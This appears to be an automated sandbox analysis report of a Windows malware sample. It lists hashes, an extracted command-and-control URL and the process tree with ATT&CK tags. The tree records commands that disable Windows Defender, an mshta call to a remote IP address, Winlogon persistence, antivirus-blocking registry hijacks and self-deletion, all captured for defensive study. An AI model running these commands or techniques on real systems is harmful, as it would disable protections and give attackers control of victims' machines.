Analysis
-
max time kernel
150s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 09:34
Static task
static1
Behavioral task
behavioral1
Sample
493862f671690d7562c0fe2926345a81_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
493862f671690d7562c0fe2926345a81_JaffaCakes118.exe
Resource
win10v2004-20240704-en
General
-
Target
493862f671690d7562c0fe2926345a81_JaffaCakes118.exe
-
Size
2.5MB
-
MD5
493862f671690d7562c0fe2926345a81
-
SHA1
b972af5505e547ea50d497c1286e9a279d8cf68e
-
SHA256
0112475e06b135c650f76c6220930dd9fc1a2d7cb8013c8367b720024b74949c
-
SHA512
b529cee8e059097685ec9383083ee35a6a078db62a08121c4744fa2f44256c8d356fdb958a03622448d5ac6dbba17430c65da5335e61020efdc342dd3a796fdf
-
SSDEEP
49152:hOukiLL0lDcAJu/STCA5bGqrQ99K9rbl0NYxlllb7paUSINL:hO2LIFJqSbGqsKAylllb7paUSINL
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=WHMFPZKA&2=i-s&3=72&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\qypyht.exe" qypyht.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 3 892 mshta.exe 7 892 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe qypyht.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" qypyht.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe qypyht.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" qypyht.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe qypyht.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" qypyht.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" qypyht.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" qypyht.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe qypyht.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe qypyht.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" qypyht.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe qypyht.exe -
Deletes itself 1 IoCs
pid Process 600 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3056 qypyht.exe -
Loads dropped DLL 2 IoCs
pid Process 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2576 sc.exe 2652 sc.exe 1036 sc.exe 2280 sc.exe 2828 sc.exe 2628 sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3056 qypyht.exe Token: SeShutdownPrivilege 3056 qypyht.exe Token: SeDebugPrivilege 3056 qypyht.exe Token: SeShutdownPrivilege 3056 qypyht.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe 3056 qypyht.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3056 qypyht.exe 3056 qypyht.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2264 wrote to memory of 2628 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 30 PID 2264 wrote to memory of 2628 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 30 PID 2264 wrote to memory of 2628 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 30 PID 2264 wrote to memory of 2628 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 30 PID 2264 wrote to memory of 2576 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 31 PID 2264 wrote to memory of 2576 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 31 PID 2264 wrote to memory of 2576 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 31 PID 2264 wrote to memory of 2576 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 31 PID 2264 wrote to memory of 2604 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 33 PID 2264 wrote to memory of 2604 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 33 PID 2264 wrote to memory of 2604 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 33 PID 2264 wrote to memory of 2604 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 33 PID 2264 wrote to memory of 2652 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 35 PID 2264 wrote to memory of 2652 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 35 PID 2264 wrote to memory of 2652 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 35 PID 2264 wrote to memory of 2652 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 35 PID 2264 wrote to memory of 3056 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 38 PID 2264 wrote to memory of 3056 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 38 PID 2264 wrote to memory of 3056 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 38 PID 2264 wrote to memory of 3056 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 38 PID 2264 wrote to memory of 600 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 39 PID 2264 wrote to memory of 600 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 39 PID 2264 wrote to memory of 600 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 39 PID 2264 wrote to memory of 600 2264 493862f671690d7562c0fe2926345a81_JaffaCakes118.exe 39 PID 2604 wrote to memory of 2000 2604 net.exe 40 PID 2604 wrote to memory of 2000 2604 net.exe 40 PID 2604 wrote to memory of 2000 2604 net.exe 40 PID 2604 wrote to memory of 2000 2604 net.exe 40 PID 3056 wrote to memory of 2828 3056 qypyht.exe 42 PID 3056 wrote to memory of 2828 3056 qypyht.exe 42 PID 3056 wrote to memory of 2828 3056 qypyht.exe 42 PID 3056 wrote to memory of 2828 3056 qypyht.exe 42 PID 3056 wrote to memory of 2280 3056 qypyht.exe 43 PID 3056 wrote to memory of 2280 3056 qypyht.exe 43 PID 3056 wrote to memory of 2280 3056 qypyht.exe 43 PID 3056 wrote to memory of 2280 3056 qypyht.exe 43 PID 3056 wrote to memory of 1228 3056 qypyht.exe 44 PID 3056 wrote to memory of 1228 3056 qypyht.exe 44 PID 3056 wrote to memory of 1228 3056 qypyht.exe 44 PID 3056 wrote to memory of 1228 3056 qypyht.exe 44 PID 3056 wrote to memory of 1036 3056 qypyht.exe 46 PID 3056 wrote to memory of 1036 3056 qypyht.exe 46 PID 3056 wrote to memory of 1036 3056 qypyht.exe 46 PID 3056 wrote to memory of 1036 3056 qypyht.exe 46 PID 1228 wrote to memory of 2284 1228 net.exe 50 PID 1228 wrote to memory of 2284 1228 net.exe 50 PID 1228 wrote to memory of 2284 1228 net.exe 50 PID 1228 wrote to memory of 2284 1228 net.exe 50 PID 3056 wrote to memory of 892 3056 qypyht.exe 51 PID 3056 wrote to memory of 892 3056 qypyht.exe 51 PID 3056 wrote to memory of 892 3056 qypyht.exe 51 PID 3056 wrote to memory of 892 3056 qypyht.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\493862f671690d7562c0fe2926345a81_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\493862f671690d7562c0fe2926345a81_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2628
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2576
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:2000
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:2652
-
-
C:\Users\Admin\AppData\Roaming\qypyht.exeC:\Users\Admin\AppData\Roaming\qypyht.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2280
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:2284
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:1036
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=WHMFPZKA&2=i-s&3=72&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\493862~1.EXE" >> NUL2⤵
- Deletes itself
PID:600
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5493862f671690d7562c0fe2926345a81
SHA1b972af5505e547ea50d497c1286e9a279d8cf68e
SHA2560112475e06b135c650f76c6220930dd9fc1a2d7cb8013c8367b720024b74949c
SHA512b529cee8e059097685ec9383083ee35a6a078db62a08121c4744fa2f44256c8d356fdb958a03622448d5ac6dbba17430c65da5335e61020efdc342dd3a796fdf